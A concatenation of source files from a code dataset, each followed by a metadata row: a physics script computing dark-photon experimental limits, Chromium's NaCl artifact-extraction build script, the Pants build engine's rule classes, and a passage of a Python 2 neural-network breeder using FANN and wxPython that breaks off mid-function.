K_Vpi_tab1=gen_K_Vpi_lim(kpip_invis_dat_1)
K_Vpi_func_1=interp1d(K_Vpi_tab1[:,0],K_Vpi_tab1[:,1],bounds_error=False,fill_value=fill_val)
K_Vpi_tab2=gen_K_Vpi_lim(kpip_invis_dat_2)
K_Vpi_func_2=interp1d(K_Vpi_tab2[:,0],K_Vpi_tab2[:,1],bounds_error=False,fill_value=fill_val)
k_Vpi_tab = [func(mv,mx,alpha_p,min(K_Vpi_func_1(mv),K_Vpi_func_2(mv))) for mv,mx in mass_arr]
print("Generating pion->invisible limits")
invispion_func=interp1d(invispiondat[:,0],invispiondat[:,1],bounds_error=False,fill_value=fill_val)
invispion_tab=[func(mv,mx,alpha_p,invispion_func(mv)) for mv,mx in mass_arr]
#Electroweak/shift in Z mass etc.
print("Generating Electroweak fit limits")
zprime_func=interp1d(zprimedat[:,0],zprimedat[:,1],bounds_error=False,fill_value=fill_val)
zprime_tab = [func(mv,mx,alpha_p,zprime_func(mv)) for mv,mx in mass_arr]
#E137
print("Generating E137 limits")
#e137dat=griddata(E137tab[:,0:2],E137tab[:,2],mass_arr,fill_value=fill_val,method='linear')
e137_vals= np.array([func(mv,mx,alpha_p,(k4alphap/alpha_p)**0.25) for mv,mx,k4alphap in E137tab])
E137_tab = griddata(E137tab[:,0:2],e137_vals,mass_arr,fill_value=fill_val,method='linear')
#MiniBooNE
print("Generating MiniBooNE limits")
miniboone_N_vals= np.array([func(mv,mx,alpha_p,(k4alphap/alpha_p)**0.25) for mv,mx,k4alphap in MiniBooNE_N_tab])
miniboone_n_tab = griddata(MiniBooNE_N_tab[:,0:2],miniboone_N_vals,mass_arr,method='linear')
miniboone_n_tab = [x for x in miniboone_n_tab if not np.isnan(x[2])]
miniboone_e_vals= np.array([func(mv,mx,alpha_p,(k4alphap/alpha_p)**0.25) for mv,mx,k4alphap in MiniBooNE_e_tab])
miniboone_e_tab = griddata(MiniBooNE_e_tab[:,0:2],miniboone_e_vals,mass_arr,method='linear')
miniboone_e_tab = [x for x in miniboone_e_tab if not np.isnan(x[2])]
#LSND
print("Generating LSND limits")
lsnd_vals= np.array([func(mv,mx,alpha_p,(k4alphap/alpha_p)**0.25) for mv,mx,k4alphap in LSNDtab])
LSND_tab = griddata(LSNDtab[:,0:2],lsnd_vals,mass_arr,method='linear')
LSND_tab = [x for x in LSND_tab if not np.isnan(x[2])]
print("Generating limits from Direct Detection")
#direct_det_tab = [func(mv,mx,alpha_p,sigman_to_kappa(Direct_Det(mx),mv,mx,alpha_p)) for mv,mx in mass_arr]
print("Generating limits from Direct Detection - Electron")
direct_det_e_tab = [func(mv,mx,alpha_p,min(sigmae_to_kappa(xenon10efunc(mx),mv,mx,alpha_p),sigmae_to_kappa(xenon100efunc(mx),mv,mx,alpha_p))) for mv,mx in mass_arr]
SCDMSe_tab= [func(mv,mx,alpha_p,sigmae_to_kappa(SCDMSefunc(mx),mv,mx,alpha_p)) for mv,mx in mass_arr]
SENSEIe_tab= [func(mv,mx,alpha_p,sigmae_to_kappa(SENSEIefunc(mx),mv,mx,alpha_p)) for mv,mx in mass_arr]
print("Generating NA64 (2019, https://arxiv.org/abs/1906.00176) limits")
NA64_func=interp1d(NA64dat[:,0],NA64dat[:,1],bounds_error=False,fill_value=fill_val)
NA64_tab=[func(mv,mx,alpha_p,NA64_func(mv)) for mv,mx in mass_arr]
#These are all projections, the year reflects the time when
#the data was recorded, not analyzed!
#NA64_2016_func=interp1d(NA64_2016dat[:,0],NA64_2016dat[:,1],bounds_error=False,fill_value=fill_val)
#NA64_2016_tab=[func(mv,mx,alpha_p,NA64_2016_func(mv)) for mv,mx in mass_arr]
#NA64_2017_func=interp1d(NA64_2017dat[:,0],NA64_2017dat[:,1],bounds_error=False,fill_value=fill_val)
#NA64_2017_tab=[func(mv,mx,alpha_p,NA64_2017_func(mv)) for mv,mx in mass_arr]
#NA64_2018_func=interp1d(NA64_2018dat[:,0],NA64_2018dat[:,1],bounds_error=False,fill_value=fill_val)
#NA64_2018_tab=[func(mv,mx,alpha_p,NA64_2018_func(mv)) for mv,mx in mass_arr]
#np.savetxt(run_name+"relic_density.dat",relic_tab)
np.savetxt(run_name+"precision_g_minus_2.dat",g_minus_2_tab)
np.savetxt(run_name+"precision_g_minus_2_electron.dat",g_minus_2_electron)
np.savetxt(run_name+"precision_g_minus_2_muon.dat",g_minus_2_muon)
np.savetxt(run_name+"precision_g_minus_2_fav_low.dat",g_muon_fav_low_tab)
np.savetxt(run_name+"precision_g_minus_2_fav_high.dat",g_muon_fav_high_tab)
#np.savetxt(run_name+"direct_det.dat",direct_det_tab)
np.savetxt(run_name+"babar.dat",babar_tab)
np.savetxt(run_name+"babar2017.dat",babar2017_tab)
#np.savetxt(run_name+"relic_density.dat",relic_tab)
np.savetxt(run_name+"rare_decay.dat",rare_tab)
np.savetxt(run_name+"monojet.dat",monojet_tab)
np.savetxt(run_name+"kpipinvisk.dat",k_Vpi_tab)
np.savetxt(run_name+"invispion.dat",invispion_tab)
np.savetxt(run_name+"zprime.dat",zprime_tab)
np.savetxt(run_name+"lsndlim.dat",LSND_tab)
np.savetxt(run_name+"miniboone_n_lim.dat",miniboone_n_tab)
np.savetxt(run_name+"miniboone_e_lim.dat",miniboone_e_tab)
np.savetxt(run_name+"e137lim.dat",E137_tab,'%.4f %.4f %.4e')
#np.savetxt(run_name+"e137lim.dat",E137_tab)
#np.savetxt(run_name+"direct_det.dat",direct_det_tab)
np.savetxt(run_name+"direct_det_e.dat",direct_det_e_tab)
np.savetxt(run_name+"sensei_e.dat",SENSEIe_tab)
np.savetxt(run_name+"scdms_e.dat",SCDMSe_tab)
np.savetxt(run_name+"NA64.dat",NA64_tab)
#np.savetxt(run_name+"NA64_2016.dat",NA64_2016_tab)
#np.savetxt(run_name+"NA64_2017.dat",NA64_2017_tab)
#np.savetxt(run_name+"NA64_2018.dat",NA64_2018_tab)
#Make an array of masses!
#marr=[[mv/1000.0,mx/1000.0] for mv in range(10,1000) for mx in range(1,mv/2,1)]
#marr=[[mv/1000.0,mx/1000.0] for mv in range(10,100) for mx in range(1,mv/2,1)]
#marr=[[0.001,0.001/3.0]]+[[3*mx/1000.0,mx/1000.0] for mx in range(1,1000)]+[[3*mx/1000.0,mx/1000.0] for mx in range(1000,3050,50)]
marr=[[3*mx/10000.0,mx/10000.0] for mx in range(1,10)]
marr+=[[3*mx/1000.0,mx/1000.0] for mx in range(1,2000)]
#marr=[[0.001,0.001/5.0]]+[[5*mx/1000.0,mx/1000.0] for mx in range(1,1000)]+[[5*mx/1000.0,mx/1000.0] for mx in range(1000,2000,50)]
make_sure_path_exists("output_2/")
#Masses are quite large, so this will take awhile.
table_of_limits(marr,run_name="output_2/y3_0.5_")
#def sigma_e_func(mv,mx,alpha_p,eps):
# return [mv,mx,sigmae(mv,mx,alpha_p,eps)]
#table_of_limits(marr,func=sigma_e_func,run_name="output/sige3_0.1_")
#mxset=5
#runname="output/mx"+masstext(mxset/1000.0)+"_"
#marr2=[[mv/1000.0,mxset/1000.0] for mv in range(mxset,4000)]
#table_of_limits(marr2,run_name=runname,func=kappa,alpha_p=0.1)
| mit | -1,278,347,884,730,586,000 | 51.583851 | 168 | 0.693244 | false |
heke123/chromium-crosswalk | native_client_sdk/src/build_tools/extract_artifacts.py | 25 | 4283 | #!/usr/bin/env python
# Copyright (c) 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import argparse
import glob
import os
import sys
if sys.version_info < (2, 7, 0):
sys.stderr.write("python 2.7 or later is required run this script\n")
sys.exit(1)
import buildbot_common
import build_paths
from build_paths import NACL_DIR, SDK_SRC_DIR, EXTRACT_ARCHIVE_DIR
sys.path.append(os.path.join(SDK_SRC_DIR, 'tools'))
import getos
import oshelpers
# TODO(binji): The artifacts should be downloaded; until then, point at the
# directory where the artifacts are built.
DOWNLOAD_ARCHIVE_DIR = build_paths.BUILD_ARCHIVE_DIR
PLATFORM = getos.GetPlatform()
GLIBC_X86_TC_DIR = os.path.join('toolchain', '%s_x86_glibc' % PLATFORM)
PNACL_TC_DIR = os.path.join('toolchain', '%s_pnacl' % PLATFORM)
PNACL_TRANSLATOR_DIR = os.path.join(PNACL_TC_DIR, 'translator')
CYGTAR = os.path.join(NACL_DIR, 'build', 'cygtar.py')
TAR = oshelpers.FindExeInPath('tar')
options = None
PPAPI_ARCHIVE = os.path.join(DOWNLOAD_ARCHIVE_DIR,
'%s_ppapi.tar.bz2' % PLATFORM)
GLIBC_ARCHIVE_MAP = [
('glibc', GLIBC_X86_TC_DIR),
('glibc_headers', os.path.join(GLIBC_X86_TC_DIR, 'x86_64-nacl', 'include')),
('glibc_x86_32_libs', os.path.join(GLIBC_X86_TC_DIR, 'x86_64-nacl', 'lib32')),
('glibc_x86_64_libs', os.path.join(GLIBC_X86_TC_DIR, 'x86_64-nacl', 'lib'))]
PNACL_ARCHIVE_MAP = [
('pnacl', PNACL_TC_DIR),
('newlib_headers', os.path.join(PNACL_TC_DIR, 'le32-nacl', 'include')),
('pnacl_libs', os.path.join(PNACL_TC_DIR, 'le32-nacl', 'lib')),
('pnacl_translator_arm_libs',
os.path.join(PNACL_TRANSLATOR_DIR, 'arm', 'lib')),
('pnacl_translator_x86_32_libs',
os.path.join(PNACL_TRANSLATOR_DIR, 'x86-32', 'lib')),
('pnacl_translator_x86_64_libs',
os.path.join(PNACL_TRANSLATOR_DIR, 'x86-64', 'lib'))]
TOOLCHAIN_ARCHIVE_MAPS = {
'glibc': GLIBC_ARCHIVE_MAP,
'pnacl': PNACL_ARCHIVE_MAP,
}
TOOLS_ARCHIVE_MAP = [('tools', 'tools')]
def Untar(archive, destdir):
if os.path.exists(TAR):
cmd = [TAR]
else:
cmd = [sys.executable, CYGTAR]
if options.verbose:
cmd.extend(['-xvf', archive])
else:
cmd.extend(['-xf', archive])
if not os.path.exists(destdir):
buildbot_common.MakeDir(destdir)
buildbot_common.Run(cmd, cwd=destdir)
def RemoveExt(path):
while True:
path, ext = os.path.splitext(path)
if ext == '':
return path
def ExtractArchive(archive_path, destdirs):
Untar(archive_path, EXTRACT_ARCHIVE_DIR)
basename = RemoveExt(os.path.basename(archive_path))
srcdir = os.path.join(EXTRACT_ARCHIVE_DIR, basename)
if type(destdirs) is not list:
destdirs = [destdirs]
for destdir in destdirs:
if not os.path.exists(destdir):
buildbot_common.MakeDir(destdir)
src_files = glob.glob(os.path.join(srcdir, '*'))
for src_file in src_files:
buildbot_common.CopyDir(src_file, destdir)
def ExtractAll(archive_dict, archive_dir, destroot):
for archive_part, rel_destdirs in archive_dict:
archive_name = '%s_%s.tar.bz2' % (PLATFORM, archive_part)
archive_path = os.path.join(archive_dir, archive_name)
if type(rel_destdirs) is not list:
rel_destdirs = [rel_destdirs]
destdirs = [os.path.join(destroot, d) for d in rel_destdirs]
ExtractArchive(archive_path, destdirs)
def main(args):
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('-v', '--verbose')
parser.add_argument('-o', '--outdir')
parser.add_argument('-t', '--toolchain', action='append', dest='toolchains',
default=[])
parser.add_argument('--clean', action='store_true')
global options
options = parser.parse_args(args)
if options.clean:
buildbot_common.RemoveDir(options.outdir)
for toolchain in options.toolchains:
ExtractAll(TOOLCHAIN_ARCHIVE_MAPS[toolchain], DOWNLOAD_ARCHIVE_DIR,
options.outdir)
ExtractAll(TOOLS_ARCHIVE_MAP, DOWNLOAD_ARCHIVE_DIR, options.outdir)
Untar(PPAPI_ARCHIVE, EXTRACT_ARCHIVE_DIR)
return 0
if __name__ == '__main__':
try:
sys.exit(main(sys.argv[1:]))
except KeyboardInterrupt:
buildbot_common.ErrorExit('extract_artifacts: interrupted')
| bsd-3-clause | -8,594,949,021,464,773,000 | 29.81295 | 80 | 0.679897 | false |
lahosken/pants | src/python/pants/engine/rules.py | 2 | 5514 | # coding=utf-8
# Copyright 2016 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import logging
from abc import abstractproperty
from collections import OrderedDict
from twitter.common.collections import OrderedSet
from pants.engine.addressable import Exactly
from pants.engine.selectors import type_or_constraint_repr
from pants.util.meta import AbstractClass
from pants.util.objects import datatype
logger = logging.getLogger(__name__)
class Rule(AbstractClass):
"""Rules declare how to produce products for the product graph.
A rule describes what dependencies must be provided to produce a particular product. They also act
as factories for constructing the nodes within the graph.
"""
@abstractproperty
def input_selectors(self):
"""Collection of input selectors"""
@abstractproperty
def func(self):
"""Rule function."""
@abstractproperty
def output_product_type(self):
"""The product type produced by this rule."""
def as_triple(self):
"""Constructs an (output, input, func) triple for this rule."""
return (self.output_product_type, self.input_selectors, self.func)
class TaskRule(datatype('TaskRule', ['input_selectors', 'func', 'product_type', 'constraint']),
Rule):
"""A Rule that runs a task function when all of its input selectors are satisfied."""
@property
def output_product_type(self):
return self.product_type
def __str__(self):
return '({}, {!r}, {})'.format(type_or_constraint_repr(self.product_type),
self.input_selectors,
self.func.__name__)
class SingletonRule(datatype('SingletonRule', ['product_type', 'func']), Rule):
"""A default rule for a product, which is thus a singleton for that product."""
@property
def input_selectors(self):
return tuple()
@property
def output_product_type(self):
return self.product_type
def __repr__(self):
return '{}({}, {})'.format(type(self).__name__,
self.product_type.__name__,
self.func.__name__)
class IntrinsicRule(datatype('IntrinsicRule', ['subject_type', 'product_type', 'func']), Rule):
"""A default rule for a pair of subject+product."""
@property
def input_selectors(self):
return tuple()
@property
def output_product_type(self):
return self.product_type
def __repr__(self):
return '{}(({}, {}), {})'.format(type(self).__name__,
self.subject_type.__name__,
self.output_product_type.__name__,
self.func.__name__)
class RuleIndex(datatype('RuleIndex', ['tasks', 'intrinsics', 'singletons'])):
"""Holds an index of tasks and intrinsics used to instantiate Nodes."""
@classmethod
def create(cls, task_entries, intrinsic_entries=None, singleton_entries=None):
"""Creates a NodeBuilder with tasks indexed by their output type."""
intrinsic_entries = intrinsic_entries or tuple()
singleton_entries = singleton_entries or tuple()
# NB make tasks ordered so that gen ordering is deterministic.
serializable_tasks = OrderedDict()
def add_task(product_type, rule):
if product_type not in serializable_tasks:
serializable_tasks[product_type] = OrderedSet()
serializable_tasks[product_type].add(rule)
for entry in task_entries:
if isinstance(entry, Rule):
add_task(entry.output_product_type, entry)
elif isinstance(entry, (tuple, list)) and len(entry) == 3:
output_type, input_selectors, task = entry
if isinstance(output_type, Exactly):
constraint = output_type
elif isinstance(output_type, type):
constraint = Exactly(output_type)
else:
raise TypeError("Unexpected product_type type {}, for rule {}".format(output_type, entry))
factory = TaskRule(tuple(input_selectors), task, output_type, constraint)
# TODO: The heterogenity here has some confusing implications here:
# see https://github.com/pantsbuild/pants/issues/4005
for kind in constraint.types:
# NB Ensure that interior types from SelectDependencies / SelectProjections work by
# indexing on the list of types in the constraint.
add_task(kind, factory)
add_task(constraint, factory)
else:
raise TypeError("Unexpected rule type: {}."
" Rules either extend Rule, or are 3 elem tuples.".format(type(entry)))
intrinsics = dict()
for output_type, input_type, func in intrinsic_entries:
key = (input_type, output_type)
if key in intrinsics:
raise ValueError('intrinsic provided by {} has already been provided by: {}'.format(
func.__name__, intrinsics[key]))
intrinsics[key] = IntrinsicRule(input_type, output_type, func)
singletons = dict()
for output_type, func in singleton_entries:
if output_type in singletons:
raise ValueError('singleton provided by {} has already been provided by: {}'.format(
func.__name__, singletons[output_type]))
singletons[output_type] = SingletonRule(output_type, func)
return cls(serializable_tasks, intrinsics, singletons)
| apache-2.0 | -5,564,196,766,072,002,000 | 35.76 | 100 | 0.653065 | false |
Buggaboo/Triathlon | TriathlonBeta/Triathlon-Breeder.py | 1 | 34773 | #!/usr/bin/python
# -*- coding: iso-8859-1 -*-
# Howto, Code license, Credits, etc: http://code.google.com/B/BCI-Project-Triathlon/
noGL = False # Set noGL to True for disabling the use of OpenGL (to gain speed, or to avoid python-wx-opengl problems)
import pyfann
from pyfann import libfann
import string
import os
import sys
import random
import copy
import wx
import numpy
from array import array
import WXElements
try:
from wx import glcanvas
haveGLCanvas = True
except ImportError:
haveGLCanvas = False
noGL = True
print "Will start without OpenGL, because wx.glcanvas is not available."
try:
# TODO - refactor this shit to prevent namespace pollution
from OpenGL.GL import *
from OpenGL.GLU import *
from OpenGL.GLUT import *
haveOpenGL = True
except ImportError:
haveOpenGL = False
noGL = True
print "Will start without OpenGL, because PyOpenGL is not available."
class AppSettings():
def __init__(self,
datafile,
desired_error = 0.0000000001,
iterations_between_reports = 1000):
self.datafile = datafile
self.desired_error = desired_error
self.iterations_between_reports = iterations_between_reports
f = open(datafile+".train", 'r')
firstline = f.readline()
f.close
l = string.split(firstline)
self.num_input = int(l[1])
self.num_output = int(l[2])
self.breeding = False
self.stage = 0
self.netsTried = 0
self.maxMutations = 18
self.populationSize = 12
self.trainingData = libfann.training_data()
self.trainingData.read_train_from_file(datafile+".train")
self.testData = libfann.training_data()
self.testData.read_train_from_file(datafile+".test")
self.flist = [libfann.FANN_LINEAR,libfann.FANN_SIGMOID,libfann.FANN_SIGMOID_STEPWISE,libfann.FANN_SIGMOID_SYMMETRIC,libfann.FANN_SIGMOID_SYMMETRIC_STEPWISE,
libfann.FANN_GAUSSIAN,libfann.FANN_GAUSSIAN_SYMMETRIC,libfann.FANN_ELLIOT,libfann.FANN_ELLIOT_SYMMETRIC,libfann.FANN_LINEAR_PIECE,
libfann.FANN_LINEAR_PIECE_SYMMETRIC,libfann.FANN_SIN_SYMMETRIC,libfann.FANN_COS_SYMMETRIC]
self.mutationlist = ["change_connection_rate",
"change_learning_rate",
"change_num_neurons_hidden",
"change_num_layers_hidden",
"change_max_iterations",
"change_training_algorithm",
"change_activation_function_hidden",
"change_activation_function_output",
"change_learning_momentum",
"change_activation_steepness_hidden",
"change_activation_steepness_output",
"change_training_param"]
self.trmutlist = ["change_connection_type",
"change_quickprop_decay",
"change_quickprop_mu",
"change_rprop_increase_factor",
"change_rprop_decrease_factor",
"change_rprop_delta_min",
"change_rprop_delta_max",
# "change_rprop_delta_zero"
]
class BreedingEventTimer(wx.Timer):
def __init__(self):
wx.Timer.__init__(self)
self.population = NeuralNetPopulation(maxSize=settings.populationSize)
self.childNN = ""
self.Start(20)
def Notify(self):
if settings.breeding:
self.evolve(1)
def evolve(self,steps):
if settings.breeding:
for i in range(steps):
newStage = 0
if settings.stage == 0:
names = ["Adam","Eve","Joe","Sue","Richard","Juan","Peter","Micheal","Olga","Sam","Olaf","Sasha","Eliza","Alan"]
for n in range(settings.populationSize):
newNet = NeuralNet(name = names[n%len(names)])
for each in range(50):
newNet.mutate()
newNet.train()
self.population.addIfBetter(newNet)
del newNet
newStage = 1
elif settings.stage == 1:
self.childNN = self.population.getAChild(settings.maxMutations)
neuralNetBreederApp.mainWindow.rightNet.setToNN(self.childNN)
newStage = 2
elif settings.stage == 2:
self.population.addIfBetter(self.childNN)
self.population.setBestUI()
newStage = 1
settings.stage = newStage
class NeuralNet():
def __init__(self,
name = "Eve",
generation = 1,
connection_rate = 0.5,
learning_rate = 0.5,
max_iterations = 50,
bornBefore = 0,
trainAlg = libfann.FANN_TRAIN_RPROP,
learning_momentum = 0.0,
neurons = [],
connectionType = "Sparse"):
settings.netsTried += 1
self.name = name
self.generation = generation
self.connection_rate = connection_rate
self.learning_rate = learning_rate
self.max_iterations = max_iterations
self.ann = ""
self.childrenHad = 0
self.bornBefore = bornBefore
self.trainAlg = trainAlg
self.learning_momentum = learning_momentum
self.mseHistory = []
self.testmseHistory = []
self.summedError = 1.0
self.neurons = copy.deepcopy(neurons)
if (self.neurons == []):
self.neurons = [[[settings.flist[random.randrange(len(settings.flist))],0.0001+(0.9999*random.random())],
[settings.flist[random.randrange(len(settings.flist))],0.0001+(0.9999*random.random())]] ,
[[settings.flist[random.randrange(len(settings.flist))],0.0001+(0.9999*random.random())]
for i in range(settings.num_output)]]
self.foodcost = (0.001*(len(self.neurons)-1)) + (0.0001*sum(map(len,self.neurons[0:-1])))
self.connectionType = connectionType
if self.ann =="":
self.ann = libfann.neural_net()
def getChild(self, num_mutations):
self.childrenHad = self.childrenHad + 1
newANN = NeuralNet(
name = ''.join([self.getNameStub(self.name) , "-" ,
str(self.generation + 1), "-" ,
str(self.childrenHad) , "-" , str(self.bornBefore + self.childrenHad)]),
generation = self.generation + 1,
connection_rate = self.connection_rate,
learning_rate = self.learning_rate,
max_iterations = self.max_iterations,
bornBefore = self.bornBefore + self.childrenHad,
trainAlg = self.trainAlg,
learning_momentum = self.learning_momentum,
neurons = self.neurons,
connectionType = self.connectionType
)
newANN.ann.set_quickprop_decay(self.ann.get_quickprop_decay())
newANN.ann.set_quickprop_mu(self.ann.get_quickprop_mu())
newANN.ann.set_rprop_increase_factor(self.ann.get_rprop_increase_factor())
newANN.ann.set_rprop_decrease_factor(self.ann.get_rprop_decrease_factor())
newANN.ann.set_rprop_delta_min(self.ann.get_rprop_delta_min())
newANN.ann.set_rprop_delta_max(self.ann.get_rprop_delta_max())
# newANN.ann.set_rprop_delta_zero(self.ann.get_rprop_delta_zero())
for each in range(random.randrange(num_mutations)):
newANN.mutate()
newANN.train()
return newANN
def mutate(self):
mutation = settings.mutationlist[random.randrange(len(settings.mutationlist))]
if mutation == "change_connection_rate":
self.connection_rate = self.connection_rate + (-0.1+(0.2*random.random()))
if self.connection_rate<0.001:
self.connection_rate = 0.001
elif self.connection_rate>1.0:
self.connection_rate = 1.0
elif mutation == "change_learning_rate":
self.learning_rate = self.learning_rate + (-0.1+(0.2*random.random()))
if self.learning_rate<0.00001:
self.learning_rate = 0.00001
elif self.learning_rate>0.99:
self.learning_rate = 0.99
elif mutation == "change_num_neurons_hidden":
layerIndex = random.randrange(len(self.neurons)-1)
if len(self.neurons[layerIndex]) <= 1:
self.neurons[layerIndex] = ([[settings.flist[random.randrange(len(settings.flist))],0.0001+(0.9999*random.random())]] +
self.neurons[layerIndex])
elif len(self.neurons[layerIndex]) >= 50:
del self.neurons[layerIndex][random.randrange(len(self.neurons[layerIndex]))]
else:
if random.random()>0.5:
self.neurons[layerIndex] = ([[settings.flist[random.randrange(len(settings.flist))],0.0001+(0.9999*random.random())]] +
self.neurons[layerIndex])
else:
del self.neurons[layerIndex][random.randrange(len(self.neurons[layerIndex]))]
elif mutation == "change_num_layers_hidden":
if len(self.neurons)==2:
self.neurons = [[[settings.flist[random.randrange(len(settings.flist))],0.0001+(0.9999*random.random())]
for each in range(1+random.randrange(10))]] + self.neurons
elif len(self.neurons)>=11:
del self.neurons[random.randrange(len(self.neurons)-1)]
elif random.random()>0.5:
del self.neurons[random.randrange(len(self.neurons)-1)]
else:
newLayerIndex = random.randrange(len(self.neurons)-1)
self.neurons = (self.neurons[:newLayerIndex] +
[[[settings.flist[random.randrange(len(settings.flist))],0.0001+(0.9999*random.random())]
for each in range(1+random.randrange(10))]] + self.neurons[newLayerIndex:])
elif mutation == "change_max_iterations":
self.max_iterations = int(float(self.max_iterations) * (0.5+(random.random())))
if self.max_iterations<10:
self.max_iterations = 10
elif self.max_iterations>50000:
self.max_iterations = 50000
elif mutation == "change_training_algorithm":
p = random.random()
if p < 0.25:
self.trainAlg = libfann.FANN_TRAIN_BATCH
elif p < 0.5:
self.trainAlg = libfann.FANN_TRAIN_RPROP
elif p < 0.75:
self.trainAlg = libfann.FANN_TRAIN_INCREMENTAL
else:
self.trainAlg = libfann.FANN_TRAIN_QUICKPROP
elif mutation == "change_activation_function_hidden":
layerIndex = random.randrange(len(self.neurons)-1)
neuronIndex = random.randrange(len(self.neurons[layerIndex]))
self.neurons[layerIndex][neuronIndex][0] = settings.flist[random.randrange(len(settings.flist))]
elif mutation == "change_activation_function_output":
layerIndex = -1
neuronIndex = random.randrange(len(self.neurons[layerIndex]))
self.neurons[layerIndex][neuronIndex][0] = settings.flist[random.randrange(len(settings.flist))]
elif mutation == "change_learning_momentum":
self.learning_momentum = self.learning_momentum + (-0.1+(0.2*random.random()))
if self.learning_momentum<0.0:
self.learning_momentum = 0.0
elif self.learning_momentum>0.99:
self.learning_momentum = 0.99
elif mutation == "change_activation_steepness_hidden":
layerIndex = random.randrange(len(self.neurons)-1)
neuronIndex = random.randrange(len(self.neurons[layerIndex]))
new = self.neurons[layerIndex][neuronIndex][1] + (-0.1+(0.2*random.random()))
if new <0.0001:
new = 0.001
elif new > 0.9999:
new = 0.9999
self.neurons[layerIndex][neuronIndex][1] = new
elif mutation == "change_activation_steepness_output":
layerIndex = -1
neuronIndex = random.randrange(len(self.neurons[layerIndex]))
new = self.neurons[layerIndex][neuronIndex][1] + (-0.1+(0.2*random.random()))
if new <0.0001:
new = 0.001
elif new > 0.9999:
new = 0.9999
self.neurons[layerIndex][neuronIndex][1] = new
elif mutation == "change_training_param":
trmutation = settings.trmutlist[random.randrange(len(settings.trmutlist))]
if trmutation == "change_connection_type":
if self.connectionType == 'Sparse':
self.connectionType = 'Shortcut'
elif self.connectionType == 'Shortcut':
self.connectionType = 'Sparse'
elif trmutation == "change_quickprop_decay":
new = self.ann.get_quickprop_decay()
new = new * (2.0*random.random())
if new < -0.3:
new = -0.3
elif new >= 0.0 :
new = -0.0000001
self.ann.set_quickprop_decay(new)
elif trmutation == "change_quickprop_mu":
new = self.ann.get_quickprop_mu()
new = new * (0.6+(0.8*random.random()))
if new <= 1.0:
new = 1.000001
elif new >= 3.0 :
new = 3.0
self.ann.set_quickprop_mu(new)
elif trmutation == "change_rprop_increase_factor":
new = self.ann.get_rprop_increase_factor()
new = new * (0.6+(0.8*random.random()))
if new <= 1.0:
new = 1.000001
elif new >= 3.0 :
new = 3.0
self.ann.set_rprop_increase_factor(new)
elif trmutation == "change_rprop_decrease_factor":
new = self.ann.get_rprop_decrease_factor()
new = new * (0.6+(0.8*random.random()))
if new <= 0.0:
new = 0.000001
elif new >= 1.0 :
new = 0.99999
self.ann.set_rprop_decrease_factor(new)
elif trmutation == "change_rprop_delta_min":
new = self.ann.get_rprop_delta_min()
new = new * (0.6+(0.8*random.random()))
if new <= 0.0:
new = 0.0
elif new >= 1.0 :
new = 0.99999
self.ann.set_rprop_delta_min(new)
elif trmutation == "change_rprop_delta_max":
new = self.ann.get_rprop_delta_max()
new = new * (0.6+(0.8*random.random()))
if new <= 1.0:
new = 1.0
elif new >= 200.0 :
new = 200.0
self.ann.set_rprop_delta_max(new)
# elif trmutation == "change_rprop_delta_zero":
# new = self.ann.get_rprop_delta_zero()
# new = new * (0.6+(0.8*random.random()))
# if new <= 0.0:
# new = 0.0001
# elif new >= 20.0 :
# new = 20.0
# self.ann.set_rprop_delta_zero(new)
self.foodcost = (0.001*(len(self.neurons)-1)) + (0.0001*sum(map(len,self.neurons[0:-1])))
def train(self):
self.ann.set_learning_momentum(self.learning_momentum)
self.ann.set_training_algorithm(self.trainAlg)
if self.connectionType == 'Sparse':
self.ann.create_sparse_array(self.connection_rate, [settings.num_input]+map(len,self.neurons))
elif self.connectionType == 'Shortcut':
self.ann.create_shortcut_array([settings.num_input]+map(len,self.neurons))
self.ann.set_learning_rate(self.learning_rate)
for layerIndex in range(len(self.neurons)):
for neuronIndex in range(len(self.neurons[layerIndex])):
funcSteep = self.neurons[layerIndex][neuronIndex]
self.ann.set_activation_function(funcSteep[0],layerIndex+1,neuronIndex)
self.ann.set_activation_steepness(funcSteep[1],layerIndex+1,neuronIndex)
itsLeft = self.max_iterations
while itsLeft > 0:
self.ann.train_on_data(settings.trainingData, 1, settings.iterations_between_reports, settings.desired_error)
itsLeft = itsLeft - 1
self.mseHistory.append(self.ann.get_MSE())
t = self.ann.test_data(settings.testData)
self.testmseHistory.append(t)
self.foodcost = 0.0000001*float(self.ann.get_total_connections())
self.summedError = 0.9*self.mseHistory[-1] + 1.1*self.testmseHistory[-1] + self.foodcost
if str(self.summedError) == 'nan':
self.summedError = 9999999.0
neuralNetBreederApp.mainWindow.updateNumberOfNets()
def getNameStub(self,name):
result = name
if '-' in result:
result = result[0:name.index('-')]
return result
class NeuralNetPopulation():
def __init__(self,maxSize = 5):
self.maxSize = maxSize
self.subjects = []
self.lastSavedName = ""
def addIfBetter(self,newSubject):
if len(self.subjects)< self.maxSize:
self.subjects.append(newSubject)
subjectIndex = len(self.subjects)-1
neuralNetBreederApp.mainWindow.subjectPanels[subjectIndex].setToNN(self.subjects[subjectIndex])
else:
newTotalValue = newSubject.summedError
highestTotalIndex = 0
highestTotalValue = 0.0
for subjectIndex in range(len(self.subjects)):
if highestTotalValue < self.subjects[subjectIndex].summedError:
highestTotalValue = self.subjects[subjectIndex].summedError
highestTotalIndex = subjectIndex
if newTotalValue< highestTotalValue:
self.subjects[highestTotalIndex] = newSubject
neuralNetBreederApp.mainWindow.subjectPanels[highestTotalIndex].setToNN(self.subjects[highestTotalIndex])
def getAChild(self,maxMutations):
return (self.subjects[random.randrange(len(self.subjects))].getChild(maxMutations))
def setBestUI(self):
bestIndex = 0
bestTotalValue = 100.0
worstTotalValue = 0.0
for subjectIndex in range(len(self.subjects)):
if self.subjects[subjectIndex].summedError < bestTotalValue:
bestIndex = subjectIndex
bestTotalValue = self.subjects[subjectIndex].summedError
if self.subjects[subjectIndex].summedError > worstTotalValue:
worstTotalValue = self.subjects[subjectIndex].summedError
neuralNetBreederApp.mainWindow.leftNet.setToNN(self.subjects[bestIndex])
if self.subjects[bestIndex].name != self.lastSavedName:
self.lastSavedName = self.subjects[bestIndex].name
self.subjects[bestIndex].ann.save(settings.datafile+".net")
if worstTotalValue*0.5 >= 0.25:
fr = 255
fg = 0
fb = 0
elif worstTotalValue*0.5 >= 0.125:
fr = 255
fg = int((1.0-((worstTotalValue*0.5-0.125)*8.0))*255.0)
fb = 0
else:
